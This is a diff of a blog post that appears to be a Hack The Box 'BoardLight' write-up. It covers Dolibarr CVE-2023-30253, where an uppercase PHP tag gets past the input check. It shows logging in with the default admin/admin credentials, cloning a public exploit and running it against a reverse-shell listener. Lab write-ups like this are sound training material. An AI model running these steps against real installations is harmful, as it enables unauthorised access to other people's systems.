Jigsaws64/Jigsaws64.github.io/_posts/2024-07-30-HTB-BoardLight.md

 ![Dolibarr CVE](/assets/images/HTB%20-%20BoardLight/Dolibarr%20CVE.png)

-[CVE-2023-30253](https://www.swascan.com/security-advisory-dolibarr-17-0-0/) tells us that an **authenticated** low privileged-user can preform PHP code injection.
+[CVE-2023-30253](https://www.swascan.com/security-advisory-dolibarr-17-0-0/) tells us that an **authenticated** low privileged-user can preform PHP code injection

 The system in Dolibarr 17.0.0 checks for lowercase `<?php` tags only.
 So when a user enters something like `<?PHP>`, it bypasses the input validation

 First we need to login to the Dolibarr application.
-Googling the default credentials tells us the default username & password is `admin` so let's try that
+Googling the default credentials tells us the default username is `admin` so let's try admin admin

 ![Logged into Dolibarr](/assets/images/HTB%20-%20BoardLight/Logged%20into%20Dolibarr.png)

-Sure enough, the default login is still available.
-Now that we have a valid login, we can run the script
+The default login is still available.
+We can perform this PHP injection manually as we have access to the GUI or we can simply run this script that makes it a bit easier

-First, let's download it
+I'm going to use the script in this writeup, but I showcase doing it manually on my YouTube walkthrough [here](https://www.youtube.com/watch?v=LAfERlbYfRk)

+Let's download the exploit

 ```bash
 git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253/tree/main?tab=readme-ov-file
 ```

-Now let' start up our nc listener and proceed to run the script!
+Now let's start up our nc listener and proceed to run the script!

 ```bash
 python3 exploit.py http://example.com login password 127.0.0.1 9001